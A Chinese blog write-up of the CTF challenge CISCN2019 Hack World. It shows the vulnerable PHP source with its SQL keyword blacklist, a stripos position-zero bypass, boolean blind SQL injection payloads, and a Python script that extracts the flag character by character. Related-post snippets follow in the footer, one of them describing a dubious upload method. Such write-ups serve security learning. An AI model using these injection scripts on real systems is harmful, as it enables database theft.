[CISCN2019 华北赛区 Day2 Web1]Hack World(排坑

最新推荐文章于 2024-04-22 11:22:22 发布
最新推荐文章于 2024-04-22 11:22:22 发布
阅读量1.3k 收藏 1
点赞数 2
分类专栏: ctf 文章标签: sql web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/120529295
版权

1NDEX

0x00 前言

惭愧,好像是第一次做盲注题(之前肯定看过,不深入而已…)
直接看了wp进行复现了
根据特定环境适用的攻击手法,熟悉一下script编写

0x01 复现

贴一下源码方便后续理解

<?php
$dbuser='root';
$dbpass='root';

function safe($sql){
    #被过滤的内容 函数基本没过滤
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
}   
mysql_select_db("ctf",$db);

if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    
    if($query){
        $result = mysql_fetch_array($query);
        
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}

在这里插入图片描述
在这里插入图片描述稍微fuzz测试一下
在这里插入图片描述
length 482皆为sql injection checked

解释一下有些在黑名单的fuzz返回bool(false)的原因(坑!)

function safe($sql){
    #被过滤的内容 函数基本没过滤
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}

注意到这边检测时用的是 stripos:查询第一次出现的位置
所以如果你fuzz时写在开头,那么stripos($id,$blackitem)返回的就是0,那么第一层就绕过了(return True了就)

if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    
    if($query){
        $result = mysql_fetch_array($query);
        
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}

再往下看,因为sql查询语句语法存在问题,所以mysql_query执行错误返回false

brain.md

通过0,1返回值不同可以进行盲注
空格过滤可以用括号包裹绕过
select(flag)from(flag)
ascii(substr((select(flag)from(flag)),1,1))=102 # f的ASCII
id=if((ascii(substr((select(flag)from(flag)),1,1))=102),1,0)
ASCII正确返回Hello,g…girlfriend

建议python写脚本
黏上我自己写的

import requests

url='http://c3da9e81-43de-4a6e-8020-b5691bb84f33.node4.buuoj.cn:81/'
result=''

for l in range(1,43):
    for i in range(32,128):
        payload='if((ascii(substr((select(flag)from(flag)),%d,1))=%d),1,0)'%(l,i)
        data={'id':payload}
        res=requests.post(url,data=data)
        res.encoding=res.apparent_encoding
        if 'girlfriend' in res.text:
            result+=chr(i)
            print(result)
            break
        if '}' in result:
            break
    if '}' in result:
        break
print(result)

参考

https://www.cnblogs.com/20175211lyz/p/11435298.html
https://blog.csdn.net/m0_46587008/article/details/110304855

0x02 rethink

不得不说sql注入真的很看经验
经验不足雀氏八星

k_du1t
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qi_SJQ_的博客
10-29 268
拿到一道sql注入题思路: 测试过滤:可以bp加字典fuzzing一下,看过滤哪些字符: 找的大佬的fuzzing字典: ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } | \ ; : ' " , . < > / ? -- --+ /**/ && || <> !(<>) and or xor if not select sleep union from where order by concat group b
国赛 2019 华北赛区 Web 题目
最新发布
05-19
ciscn
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
m0_73734159的博客
12-09 925
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。可知是字符型的布尔注入(盲注)
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1724
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 627
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
【CTF-web】buuctf-[CISCN2019 华北赛区 Day2 Web1]Hack Worldsql盲注)
Sankkl1的博客
08-18 427
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
【复习】[CISCN2019 华北赛区 Day2 Web1]Hack World -----sql注入
Zero_Adam的博客
05-16 369
目录:一、自己做:二、 学到的:不足: 一、自己做: 输入1和2 的时候是有正常的查询结果的。然后输入3的话就超过了。 输入其他的,不是id数字的就直接bool (false) 然后fuzz测试:482是给过滤的。 过滤了不少,仔细看一下, handler过滤了。像强网杯的那些就不行了。 information 被过滤了。可以用那些sys来查找表明,然后用无列名注入就好。 limit 被过滤了。要么就union select 要么就不用了。 或,与过滤了。可以用 ^异或。 空格,注释符,/**/
国赛华北赛区Day1Web2源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web2源码+学习说明.zip
国赛华北赛区Day1Web1源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...国赛华北赛区Day1Web1源码+学习说明.zip
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
【BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 738
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
BUUCTF_web部分题解
热门推荐
ro4lsc的博客
04-14 1万+
[极客大挑战 2019]Havefun [CISCN2019 华北赛区 Day2 Web1]Hack World [极客大挑战 2019]Secret File [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [极客大挑战 2019]Http [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]BabySQL [极客大挑战 2019]BuyFlag [ZJCTF 2019]NiZhuanSiWei [ACTF2020 新生赛]Include
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的用户名和密码,但是都无法登录成功。因此,我们需要通过其他方式来获取flag。 我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤如下: 1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: <?php echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,xxxxxxxxxxxxxxxxxxxx为flag的具体内容。 5. 发送修改后的上传请求,上传文件。 6. 访问上传的文件,即可获取flag。 通过以上步骤,我们就可以成功获取到flag了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值